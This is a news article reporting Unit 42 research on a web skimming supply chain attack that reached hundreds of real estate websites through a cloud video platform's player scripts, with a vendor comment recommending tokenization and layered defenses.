Connect with us

Hi, what are you looking for?

Hard News Hard Hitting News Source Global Political News

Cyber Security

Web skimming attacks on hundreds of real estate websites deployed via cloud video hosting service

Web skimming attacks are targeting hundreds of real estate websites via a cloud-based video hosting service, researchers have warned.

blog post from Unit 42, the research arm of Palo Alto Networks, revealed how attackers are using the service to carry out a supply chain attack to inject card skimming malware onto victim sites.

Web skimming attacks occur when malicious script is injected into sites to steal information entered into web forms.

For example, an online booking form might ask for a website user’s personal details and payment information. If this site was vulnerable to skimming attacks, the malicious actors could intercept the data.

The Unit 42 blog post reads: “Recently, we found a supply chain attack leveraging a cloud video platform to distribute skimmer (aka ‘formjacking’) campaigns.

“In the case of the attacks described here, the attacker injected the skimmer JavaScript codes into video, so whenever others import the video, their websites get embedded with skimmer codes as well.”

The researchers detailed how the skimmer infected the websites, explaining that when the cloud platform user creates a video player, the user is allowed to add their own JavaScript customizations by uploading a .js file to be included in their player.

In this specific instance, the user uploaded a script that could be modified upstream to include malicious content.

The post reads: “We infer that the attacker altered the static script at its hosted location by attaching skimmer code. Upon the next player update, the video platform re-ingested the compromised file and served it along with the impacted player.

“From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server, https://cdn-imgcloud[.]com/img, which is also marked as malicious in VirusTotal.”

Closing the backdoor

The websites in question were all owned by the same parent company, which hasn’t been named.

Unit 42 researchers said they have informed the organization and have helped them to remove the malware.

The blog post contains more technical information on how the skimmer operates.

Trevor Morgan, product manager at comforte AG, commented: “As these types of attacks continue to evolve in sophistication and cleverness, enterprises need to remain focused on the basics: develop a defensive strategy incorporating more than just perimeter-based security, don’t assume that cloud-based services are inherently safe without proper due diligence, and put a priority on emerging data-centric security methods such as tokenization and format-preserving encryption, which can apply protections directly to the sensitive data that threat actors are after.

“Tokenizing data as soon as it enters your enterprise workflows means that business applications and users can continue to work with that information in a protected state, but more importantly if the wrong people get ahold of it, either inadvertently or through coordinated attacks like this one, the sensitive information remains obfuscated so that threat actors cannot leverage it for gain.”

Advertisement. Scroll to continue reading.

Source: https://portswigger.net/daily-swig/web-skimming-attacks-on-hundreds-of-real-estate-websites-deployed-via-cloud-video-hosting-service

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

The cybercrime group evaded remediation efforts by installing persistent backdoors and deploying “new and novel malware.” A Chinese-linked hacking group that security researchers say...

Cyber Security

The administration and its private sector partners announced a slate of new initiatives on Monday aimed at protecting the nation’s school systems and their...

Cyber Security

The plan includes measures for improving cybersecurity knowledge at all levels of education and improving how the federal government attracts, hires and pays cybersecurity...

Cyber Security

Using a vulnerability in MOVEit Transfer, hackers gained access to 8 to 11 million individuals’ ‘Users Data’ protected health information. Maximus, a US government contracting...

Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO